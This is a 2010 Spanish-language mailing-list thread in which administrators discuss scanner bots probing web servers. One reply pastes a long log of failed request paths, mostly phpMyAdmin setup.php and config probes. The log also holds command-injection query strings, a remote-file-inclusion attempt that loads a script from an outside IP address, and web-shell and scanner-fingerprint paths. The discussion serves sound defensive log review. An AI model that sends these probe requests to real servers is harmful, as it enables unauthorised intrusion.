Re: [OT] Patrones de búsqueda por spider robots en Directorios
Wed, 8 Dec 2010, Pablo Zuñiga:
Estimados:
quiero compartir la siguiente acotación en cuanto a un poco el tema
de seguridad, me he dado cuenta que hay unos web robots (spider
robots) que buscan siempre los mismos directorios.
la mayoria tiene la siguiente estructura
/phpMyAdmin-2.6.3/scripts/setup.php 4
/remat/tendon165.php 4
/phpMyAdmin-2.6.2-rc1/scripts/setup.php 4
/remat/tanning96.php 4
/remat/system49.php 4
/remat/texas207.php 4
/phpmanager/scripts/setup.php 3
/phpmyadmin1/scripts/setup.php 3
/remat/theater235.php 3
/mysql-admin/scripts/setup.php 3
/remat/syndrome18.php 3
/remat/texas201.php 3
/phpMyAdmin-2/scripts/setup.php 3
/web/scripts/setup.php 3
/admin/phpmyadmin/scripts/setup.php 3
/remat/tennis171.php 3
/sqlweb/scripts/setup.php 3
los archivos robots.txt están desactivados para que puedan buscar e
indexar, alguien ha revisado mas de este tipo de comportamiento? yo
busque si dentro de los directorios que se crean en servidores debian
pillabamos la misma estructura de subdirectorios, así que concluyo que
esta mas orientado a instalaciones personalizadas en algún ambiente
windows aunque desconozco si otras distros trabajaran así
Da lo mismo que tengas activados o desactivados el "robots.txt",
porque lo que buscan las "arañitas" que comentas son vulnerabilidades de
ciertos servicios, y no respetan esas sutilezas.
Supongo que habrá algun módulo para el servidor web para evitar
estos ataques, pero mientras no tengas alguna de los productos y versiones
vulnerables instalada en una de las rutas que buscan no debieras
preocuparte. ?:-)
Para hacerte una idea del número y cantidad de estos ataques,
pongo algunas rutas que consiguen 404 en un pequeño servidor:
/about.php
//admin/
/admin/
//Admin/
//admin/config/config.inc.php?p=phpinfo();
///admin/login.php
//admin/phpmyadmin/
/admin/phpmyadmin/scripts/setup.php
/admin/pma/scripts/setup.php
//admin/scripts/setup.php
/admin/scripts/setup.php
/appserv/main.php?appserv_root=http://220.130.56.140/appserv/t.txt?
/appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt?
//awstats/awstats.pl
//awstats.pl
//bbs/data/
/bin/msgimport
//catalog//admin/login.php
//cgi/awstats.pl
//cgi-bin/awstats/awstats.pl
//cgi-bin/awstats.pl
//cgi-bin/stats/awstats.pl
//cgi/stats/awstats.pl
/chat//chat/messagesL.php3
//chat/messagesL.php3
/chatroom//chat/messagesL.php3
/chats//chat/messagesL.php3
//config/
//config/config.inc.php?p=phpinfo();
//cpanelsql/
/cube//bin/msgimport
/cube/README
//dbadmin/
//dbadmin/config/config.inc.php?p=phpinfo();
/dbadmin/scripts/setup.php
//db/config/
/db/scripts/setup.php
/e107_docs/gpl.txt
/e107/e107_docs/gpl.txt
/forum//chat/messagesL.php3
FsoapCaller.bs
/horde2//README
/horde-3.0.9//README
/horde3//README
/horde//README
/Horde//README
HTTP/1.1
http://125.45.109.166/proxyheader.php
http://216.245.205.74/proxy.php
http://218.10.111.119/check.php
http://69.175.104.218/proxychecker/check.cgi?action=getinfo
http://98.126.64.106/judge123.php
http://buysellads.com/about
http://cashads4u.com/eg/proxyheader.php
http://seekerfeed.com/proxyheader.php
http://www.365track.com/proxyheader.php
http://www.artnposter.com/proxy/judge.php
http://www.bankjia.com/ip.php
http://www.couponaide.com/proxyheader.php
http://www.eduju.com/proxyheader
http://www.google.com/imghp?hl=en
http://www.health-free.com/proxyheader.php
http://www.infodownload.info/proxyheader.php
http://www.kanzuqiu.com/proxyheader.php
http://www.piggmail.com/proxyheader.php
http://www.quickebuy.com/505.php
/icons/apache_pb.gif
/iker/
/include/shell.php?x=x
/index.html
/ip
//mail/
/mail2//bin/msgimport
/mail2/README
/mail//bin/msgimport
//mail/config.inc.php?p=phpinfo();
/mail/README
/mail/src/login.php
/mail/src/redirect.php
/mail/src/webmail.php
/mss2//bin/msgimport
/mss2/README
/mss/README
//myadmin/
//myadmin/config/config.inc.php?p=phpinfo();
//myadmin/scripts/setup.php
/myadmin/scripts/setup.php
/mychat//chat/messagesL.php3
//mysql/
//mysql-admin/
//mysqladmin/
//mysqladminconfig/
/mysql-admin/scripts/setup.php
/mysqladmin/scripts/setup.php
//mysql/config/config.inc.php?p=phpinfo();
//mysqlmanager/
/mysqlmanager/scripts/setup.php
//mysql/scripts/setup.php
/mysql/scripts/setup.php
//phpadmin/
//phpadmin/scripts/setup.php
/phpadmin/scripts/setup.php
/phpchat//chat/messagesL.php3
//phpmanager/
/phpmanager/scripts/setup.php
/phpma/scripts/setup.php
//phpmya/
//php-my-admin/
//php-myadmin/
//phpmy-admin/
//phpmyadmin/
//phpMyAdmin/
//PHPmyadmin
//PHPMYADMIN/
/phpmyadmin1/scripts/setup.php
//phpmyadmin2/
//phpMyAdmin2/
/phpMyAdmin-2.2.3/scripts/setup.php
/phpMyAdmin-2.2.6/scripts/setup.php
/phpMyAdmin-2.5.1/scripts/setup.php
/phpMyAdmin-2.5.4/scripts/setup.php
/phpMyAdmin-2.5.5-pl1/scripts/setup.php
/phpMyAdmin-2.5.5-rc1/scripts/setup.php
/phpMyAdmin-2.5.5-rc2/scripts/setup.php
/phpMyAdmin-2.5.5/scripts/setup.php
/phpMyAdmin-2.5.6-rc1/scripts/setup.php
/phpMyAdmin-2.5.6-rc2/scripts/setup.php
/phpMyAdmin-2.5.6/scripts/setup.php
/phpMyAdmin-2.5.7-pl1/scripts/setup.php
/phpMyAdmin-2.5.7/scripts/setup.php
/phpMyAdmin-2.6.0-alpha2/scripts/setup.php
/phpMyAdmin-2.6.0-alpha/scripts/setup.php
/phpMyAdmin-2.6.0-beta1/scripts/setup.php
/phpMyAdmin-2.6.0-beta2/scripts/setup.php
/phpMyAdmin-2.6.0-pl1/scripts/setup.php
/phpMyAdmin-2.6.0-pl2/scripts/setup.php
/phpMyAdmin-2.6.0-pl3/scripts/setup.php
/phpMyAdmin-2.6.0-rc1/scripts/setup.php
/phpMyAdmin-2.6.0-rc2/scripts/setup.php
/phpMyAdmin-2.6.0-rc3/scripts/setup.php
/phpMyAdmin-2.6.0/scripts/setup.php
/phpMyAdmin-2.6.1-pl1/scripts/setup.php
/phpMyAdmin-2.6.1-pl2/scripts/setup.php
/phpMyAdmin-2.6.1-pl3/scripts/setup.php
/phpMyAdmin-2.6.1-rc1/scripts/setup.php
/phpMyAdmin-2.6.1-rc2/scripts/setup.php
/phpMyAdmin-2.6.1/scripts/setup.php
/phpMyAdmin-2.6.2-beta1/scripts/setup.php
/phpMyAdmin-2.6.2-pl1/scripts/setup.php
/phpMyAdmin-2.6.2-rc1/scripts/setup.php
/phpMyAdmin-2.6.2/scripts/setup.php
/phpMyAdmin-2.6.3-pl1/scripts/setup.php
/phpMyAdmin-2.6.3-rc1/scripts/setup.php
/phpMyAdmin-2.6.3/scripts/setup.php
/phpMyAdmin-2.6.4-pl1/scripts/setup.php
/phpMyAdmin-2.6.4-pl2/scripts/setup.php
/phpMyAdmin-2.6.4-pl3/scripts/setup.php
/phpMyAdmin-2.6.4-pl4/scripts/setup.php
/phpMyAdmin-2.6.4-rc1/scripts/setup.php
/phpMyAdmin-2.6.4/scripts/setup.php
/phpMyAdmin-2.7.0-beta1/scripts/setup.php
/phpMyAdmin-2.7.0-pl1/scripts/setup.php
/phpMyAdmin-2.7.0-pl2/scripts/setup.php
/phpMyAdmin-2.7.0-rc1/scripts/setup.php
/phpMyAdmin-2.7.0/scripts/setup.php
/phpMyAdmin-2.8.0.1/scripts/setup.php
/phpMyAdmin-2.8.0.2/scripts/setup.php
/phpMyAdmin-2.8.0.3/scripts/setup.php
/phpMyAdmin-2.8.0.4/scripts/setup.php
/phpMyAdmin-2.8.0-beta1/scripts/setup.php
/phpMyAdmin-2.8.0-rc1/scripts/setup.php
/phpMyAdmin-2.8.0-rc2/scripts/setup.php
/phpMyAdmin-2.8.0/scripts/setup.php
/phpMyAdmin-2.8.1-rc1/scripts/setup.php
/phpMyAdmin-2.8.1/scripts/setup.php
/phpMyAdmin-2.8.2/scripts/setup.php
//phpmyadmin2/config.inc.php?p=phpinfo();
//phpMyAdmin2/config.inc.php?p=phpinfo();
/phpmyadmin2/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/phpmyadmin/config/config.inc.php?c=uptime
/phpMyAdmin/config/config.inc.php?c=uptime
//php-my-admin/config/config.inc.php?p=phpinfo();
//phpmyadmin/config/config.inc.php?p=phpinfo();
//phpMyAdmin/config/config.inc.php?p=phpinfo();
//PHPMYADMIN/config/config.inc.php?p=phpinfo();
/phpmyadmin/config.inc.php?c=uptime
/phpMyAdmin/config.inc.php?c=uptime
/phpmyadmin/config/root.php?c=uptime
/phpMyAdmin/config/root.php?c=uptime
/phpmyadmin/root/root.php?c=uptime
/phpMyAdmin/root/root.php?c=uptime
//phpMyAdmins/
//php-my-admin/scripts/setup.php
//phpmyadmin//scripts/setup.php
//phpmyadmin/scripts/setup.php
/php-my-admin/scripts/setup.php
/php-myadmin/scripts/setup.php
/phpmy-admin/scripts/setup.php
/phpmyadmin//scripts/setup.php
/phpmyadmin/scripts/setup.php
//phpMyAdmin/scripts/setup.php
/phpMyAdmin//scripts/setup.php
/phpMyAdmin/scripts/setup.php
/phpmyadmin//setup/config.php?type=post
/phpMyAdmin//setup/config.php?type=post
/phpmychat//chat/messagesL.php3
/phpMyChat//chat/messagesL.php3
/PhpMyChat//chat/messagesL.php3
//phppgadmin/
//phppgadmin/config.inc.php?p=phpinfo();
/php/phpmychat//chat/messagesL.php3
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=
//p/m/a/
//pma/
//PMA/
//pma2005/
//PMA2005/
//pma2005/config/
//PMA2005/config/
/pma2005/scripts/setup.php
/PMA2005/scripts/setup.php
//pma/c
//p/m/a/config/
//pma/config/
//pMA/config/
//p/m/a/config/config.inc.php?p=phpinfo();
//pma/config/config.inc.php?p=phpinfo();
//pma/scripts/setup.php
/p/m/a/scripts/setup.php
/pma//scripts/setup.php
/pma/scripts/setup.php
/pma//setup/config.php?type=post
/rc//bin/msgimport
/rc/README
/README
//README
/rms//bin/msgimport
/rms/README
/round//bin/msgimport
//roundcube/
/roundcube-0.1//bin/msgimport
/roundcube-0.1/README
/roundcube-0.2//bin/msgimport
/roundcube-0.2/README
/roundcube//bin/msgimport
/roundcubemail-0.1//bin/msgimport
/roundcubemail-0.1/README
/roundcubemail-0.2//bin/msgimport
/roundcubemail-0.2/README
/roundcubemail//bin/msgimport
/roundcubemail/README
/roundcube/README
/round/README
//scripts/setup.php
/scripts/setup.php
//shop//admin/login.php
//sl2/data/
soapCaller.bs
//sql/
//SQL/config/
//sqlmanager/
/sqlmanager/scripts/setup.php
//sqlweb/
//sqlweb/config/
/sqlweb/scripts/setup.php
//SSLMySQLAdmin/
//stats/awstats.pl
//typo3/phpmyadmin/scripts/setup.php
/typo3/phpmyadmin/scripts/setup.php
/upload.php
/user/soapCaller.bs
//user/templates/footer.tpl
/vhcs2/tools/pma/scripts/setup.php
/w00tw00t.at.blackhats.romanian.anti-sec:)
//webadmin/
/webadmin/scripts/setup.php
//webdb/
/webdb/scripts/setup.php
//webmail/
/webmail2//bin/msgimport
/webmail2/README
/webmail//bin/msgimport
//webmail/config.inc.php?p=phpinfo();
/webmail/README
/web/phpmyadmin/scripts/setup.php
//web/phpMyAdmin/scripts/setup.php
/web/phpMyAdmin/scripts/setup.php
//web/scripts/setup.php
/web/scripts/setup.php
//websql/
/websql/scripts/setup.php
/wm//bin/msgimport
/wm/README
//xampp/phpmyadmin/scripts/setup.php
/xampp/phpmyadmin/scripts/setup.php
--
Saludos --- Angel
Reply to: